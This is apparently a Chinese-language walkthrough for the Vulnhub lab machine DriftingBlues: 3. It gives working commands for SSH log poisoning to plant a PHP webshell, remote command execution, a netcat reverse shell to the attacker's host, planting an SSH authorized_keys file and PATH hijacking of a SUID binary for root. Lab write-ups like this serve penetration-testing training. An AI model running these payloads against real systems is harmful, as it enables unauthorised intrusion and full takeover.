Vulnhub: DriftingBlues: 3靶机

kali:192.168.111.111

靶机:192.168.111.192

信息收集

端口扫描

bash 复制代码
nmap -A -sC -v -sV -T5 -p- --script=http-enum 192.168.111.192

查看robots.txt得到提示

访问eventadmins提示littlequeenofspades.html

查看littlequeenofspades.html源码

base64解密后提示adminsfixit.php

访问后发现ssh日志内容会写入该文件

写入webshell

bash 复制代码
ssh '<?php system($_GET["cmd"]);?>'@192.168.111.192

执行命令

bash 复制代码
http://192.168.111.192/adminsfixit.php?cmd=id

获得反弹shell

bash 复制代码
http://192.168.111.192/adminsfixit.php?cmd=nc -e /bin/bash 192.168.111.111 4444

提权

robertj用户.ssh文件夹有写入权限

本地生成ssh公私钥,公钥文件名修改为authorized_keys后上传目标.ssh目录

bash 复制代码
ssh-keygen -f id_rsa
mv id_rsa.pub authorized_keys

登录后查找suid权限的文件

bash 复制代码
ssh robertj@192.168.111.192 -i id_rsa
find / -perm -u=s 2> /dev/null

执行该文件的同时会执行uname命令

bash 复制代码
strings getinfo

修改环境变量提权为root

bash 复制代码
echo '/bin/bash' > /tmp/uname
chmod 777 /tmp/uname
export PATH=/tmp:$PATH
/usr/bin/getinfo
相关推荐
一勺菠萝丶8 小时前
生产环境平滑升级实战-Nginx维护页数据库迁移与安全回滚
数据库·nginx·安全
味悲10 小时前
搭建WAF+宝塔反向代理
安全
BenSmith11 小时前
RTOS漏洞分析:CVE-2026-10641和CVE-2026-9263
安全
Dola_Zou12 小时前
以CmASIC重塑AI+边缘设备的安全与商业复利
人工智能·安全·软件工程·软件加密
小小小小钰儿12 小时前
网络安全名词术语!
安全·web安全·计算机·网络安全·黑客·编程
其实防守也摸鱼13 小时前
运维--安全与数据库
网络·数据库·学习·安全·安全威胁分析·数据库架构·软件安全
阿图灵14 小时前
requests 请求429报错解决方案(Vercel 平台安全拦截)
安全
拥抱太阳061615 小时前
HarmonyOS 应用开发《掌上英语》第14篇:可空类型与安全调用:ArkTS 的非空保障策略
安全
Sirius Wu15 小时前
OpenClaw Observability 并发安全(Per-Request Hook)完整详解
服务器·网络·人工智能·安全·ai·架构·aigc
xywww16816 小时前
AWS 账号安全加固:Root 与 IAM 用户的 MFA 设置实操清单
安全·云计算·aws